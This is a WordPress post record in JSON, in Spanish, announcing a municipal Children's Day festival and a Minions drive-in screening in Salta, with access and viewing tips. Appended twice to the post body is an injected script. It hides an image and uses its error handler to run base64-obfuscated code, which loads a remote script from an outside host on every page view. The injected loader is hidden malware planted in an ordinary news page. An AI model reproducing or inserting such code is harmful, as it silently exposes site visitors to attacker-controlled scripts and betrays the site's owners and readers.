{"id":1370,"date":"2022-08-26T10:42:03","date_gmt":"2022-08-26T13:42:03","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=1370"},"modified":"2025-08-14T00:37:24","modified_gmt":"2025-08-14T03:37:24","slug":"recomendaciones-para-disfrutar-de-la-funcion-de-autocine-este-sabado","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=1370","title":{"rendered":"Recomendaciones para disfrutar de la funci\u00f3n de autocine este s\u00e1bado"},"content":{"rendered":"\n<h4 class=\"has-cyan-bluish-gray-color has-text-color has-background wp-block-heading\" style=\"background-color:#d30da2\"><strong><em>En el marco del Mes de las Infancias, se recuerda que el festival por el D\u00eda de la Ni\u00f1ez, organizado por la comuna, se desarrollar\u00e1 a partir de las 16, en la playa de estacionamiento del Centro C\u00edvico Municipal (CCM), ubicado en Av. Paraguay 1.240.<\/em><\/strong><\/h4>\n\n\n\n<p>La Municipalidad de Salta, en el marco del Mes de las Infancias, recuerda que se realizar\u00e1 un festival para celebrar el D\u00eda de la Ni\u00f1ez, el s\u00e1bado 27, a partir de las 16, en el Centro C\u00edvico Municipal (CCM), ubicado en Paraguay 1.240.<\/p>\n\n\n\n<p>Es importante recordar que,&nbsp;la actividad comenzar\u00e1 con la recepci\u00f3n de los invitados por parte de malabaristas y zanquistas. Tambi\u00e9n, habr\u00e1 espect\u00e1culos en vivo de payasos, sorteos de bicicletas, el show de \u00d1aca \u00d1aca&nbsp;y la presentaci\u00f3n de la banda infantil \u201cJuanetes\u201d.<\/p>\n\n\n\n<p>Al finalizar la jornada, los vecinos podr\u00e1n disfrutar de una funci\u00f3n de Autocine. La pel\u00edcula elegida previamente por el p\u00fablico en las encuestas fue \u201cMinions, el origen de Gru\u201d.<\/p>\n\n\n\n<p>Los participantes pueden ingresar con cualquier medio de movilidad: autos, camionetas, motos, bicicletas o a pie. Quienes deseen ver la pel\u00edcula afuera del veh\u00edculo podr\u00e1n traer sillas, reposeras o mantas.<\/p>\n\n\n\n<p>El acceso de los autos ser\u00e1 por calle Lola Mora, mientras que para peatones y bicicletas se dispuso la entrada por avenida Paraguay 1.240.<\/p>\n\n\n\n<p>La pel\u00edcula podr\u00e1 escucharse a trav\u00e9s de la radio con el dial que figurar\u00e1 en pantalla o por los parlantes que se ubicar\u00e1n a los costados de la misma.<\/p>\n\n\n\n<p>En este sentido, la comuna brinda una serie de recomendaciones para que los asistentes puedan disfrutar mejor de la pel\u00edcula.<\/p>\n\n\n\n<p>Primeramente, para mayor visibilidad y comodidad, se requiere que los veh\u00edculos de gran tama\u00f1o se acomoden en los laterales. La zona de adelante estar\u00e1 reservada para peatones y ciclistas.<\/p>\n\n\n\n<p>Adem\u00e1s, se aconseja encender el motor al menos una vez durante 5 minutos, para recargar la bater\u00eda del auto. Asimismo, se solicita que los que deseen ver la pel\u00edcula dentro del veh\u00edculo no enciendan las luces para evitar molestias.<\/p>\n\n\n\n<p><strong>Conoc\u00e9 m\u00e1s sobre el film elegido:<\/strong><\/p>\n\n\n\n<p>Minions, el origen de Gru (2022): \u00abSon los a\u00f1os 70 y Gru crece en un barrio residencial, en pleno boom de los peinados cardados y los pantalones de campana. Como fan incondicional de un famoso supergrupo de villanos, \u2018Los salvajes 6\u2019, Gru idea un plan para demostrarles que es lo suficientemente malvado como para trabajar con ellos. Por suerte, cuenta con la ayuda de sus fieles seguidores, los Minions, siempre dispuestos a sembrar el caos por donde pasan\u00bb.<\/p>\n\n\n\n<p>\u00abJuntos, Kevin, Stuart, Bob, y Otto, desplegar\u00e1n su potencial para construir junto a Gru su primera guarida, experimentar con sus primeras armas y llevar a cabo sus primeras misiones\u00bb.<\/p>\n\n\n\n<p>La pel\u00edcula tiene una duraci\u00f3n de 86 minutos y est\u00e1 dirigida por Kyle Balda, Brad Ableson y Jonathan del Val.<\/p>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img fetchpriority=\"high\" decoding=\"async\" width=\"1024\" height=\"557\" data-id=\"1372\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/el-origen-de-gru.jpeg\" alt=\"\" class=\"wp-image-1372\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/el-origen-de-gru.jpeg 1024w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/el-origen-de-gru-300x163.jpeg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/el-origen-de-gru-768x418.jpeg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/el-origen-de-gru-696x379.jpeg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/el-origen-de-gru-772x420.jpeg 772w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" width=\"961\" height=\"502\" data-id=\"1371\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/festival-dia-del-nino-flyer.jpg\" alt=\"\" class=\"wp-image-1371\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/festival-dia-del-nino-flyer.jpg 961w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/festival-dia-del-nino-flyer-300x157.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/festival-dia-del-nino-flyer-768x401.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/festival-dia-del-nino-flyer-696x364.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/festival-dia-del-nino-flyer-804x420.jpg 804w\" sizes=\"(max-width: 961px) 100vw, 961px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-full\"><img decoding=\"async\" width=\"1024\" height=\"681\" data-id=\"1374\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/autocine-6.jpg\" alt=\"\" class=\"wp-image-1374\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/autocine-6.jpg 1024w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/autocine-6-300x200.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/autocine-6-768x511.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/autocine-6-696x463.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/autocine-6-632x420.jpg 632w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n\n\n\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\n<iframe title=\"Minions: Nace un Villano \u2013 Tr\u00e1iler Oficial (Universal Pictures) HD\" width=\"696\" height=\"392\" src=\"https:\/\/www.youtube.com\/embed\/MO019NU9XUk?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen><\/iframe>\n<\/div><\/figure>\n\n\n\n<figure class=\"wp-block-image size-full is-resized\"><a href=\"https:\/\/prensa.municipalidadsalta.gob.ar\/recomendaciones-para-disfrutar-de-la-funcion-de-autocine-este-sabado\/\" target=\"_blank\" rel=\"noreferrer noopener\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/Captura-web_26-8-2022_104031_prensa.municipalidadsalta.gob_.ar_.jpeg\" alt=\"\" class=\"wp-image-1375\" width=\"117\" height=\"56\"\/><\/a><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>En el marco del Mes de las Infancias, se recuerda que el festival por el D\u00eda de la Ni\u00f1ez, organizado por la comuna, se desarrollar\u00e1 a partir de las 16, en la playa de estacionamiento del Centro C\u00edvico Municipal (CCM), ubicado en Av. Paraguay 1.240. La Municipalidad de Salta, en el marco del Mes de [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":1373,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[26,17],"tags":[],"class_list":{"0":"post-1370","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-culturales","8":"category-sociales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1370"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1370"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1370\/revisions"}],"predecessor-version":[{"id":7378,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1370\/revisions\/7378"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/1373"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1370"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1370"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1370"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}